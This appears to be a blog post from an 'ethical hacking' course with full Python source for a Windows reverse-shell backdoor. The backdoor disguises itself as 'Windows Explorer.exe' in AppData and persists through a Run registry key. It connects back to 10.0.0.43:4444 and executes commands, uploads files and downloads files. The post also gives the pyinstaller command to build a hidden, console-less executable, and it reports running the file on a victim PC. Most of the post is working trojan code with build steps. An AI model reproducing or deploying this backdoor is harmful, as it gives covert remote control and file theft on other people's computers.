• Python Ethical Hacking


    Polish the Python code by adding the become_persistent function.

    #!/usr/bin/env python
    import json
    import socket
    import subprocess
    import os
    import base64
    import sys
    import shutil
    
    
    class Backdoor:
        def __init__(self, ip, port):
            self.become_persistent()
            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.connection.connect((ip, port))
    
        def become_persistent(self):
            evil_file_location = os.environ["appdata"] + "\Windows Explorer.exe"
            if not os.path.exists(evil_file_location):
                shutil.copyfile(sys.executable, evil_file_location)
                subprocess.call('reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v test /t REG_SZ /d "' + evil_file_location + '"', shell=True)
    
        def reliable_send(self, data):
            json_data = json.dumps(data).encode()
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024).decode()
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def change_working_directory_to(self, path):
            os.chdir(path)
            return "[+] Changing working directory to " + path
    
        def execute_system_command(self, command):
            DEVNULL = open(os.devnull, "wb")
            return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)
    
        def read_file(self, path):
            with open(path, "rb") as file:
                return base64.b64encode(file.read())
    
        def write_file(self, path, content):
            with open(path, "wb") as file:
                file.write(base64.b64decode(content))
                return "[+] Upload successful."
    
        def run(self):
            while True:
                command = self.reliable_receive()
    
                try:
                    if command[0] == "exit":
                        self.connection.close()
                        sys.exit()
                    elif command[0] == "cd" and len(command) > 1:
                        command_result = self.change_working_directory_to(command[1])
                    elif command[0] == "upload":
                        command_result = self.write_file(command[1], command[2])
                    elif command[0] == "download":
                        command_result = self.read_file(command[1]).decode()
                    else:
                        command_result = self.execute_system_command(command).decode()
                except Exception:
                    command_result = "[-] Error during command execution."
    
                self.reliable_send(command_result)
    
    
    try:
        my_backdoor = Backdoor("10.0.0.43", 4444)
        my_backdoor.run()
    except Exception:
        sys.exit()

    Convert to Windows executable file.

    wine /root/.wine/drive_c/Program Files (x86)/Python37-32/Scripts/pyinstaller.exe reverse_backdoor.py --onefile --noconsole

    Execute the reverse_backdoor file on the victim Windows 10 PC.

     

     

     

     Restarted the victim Windows PC and the communication established automatically.

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    如何下载、安装、启动WebTours
    Jmeter--录制脚本-用户参数化-添加断言
    UTF-8与GBK的区别
    日志的等级
    程序员与英语
    遇到安装app不识别的情况
    苹果手机怎么追踪定位
    如何制作微信表情
    比美图还要简单的在线photoshop
    Mac 下 搭建 svn 服务器
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11665784.html
Copyright © 2020-2023  润新知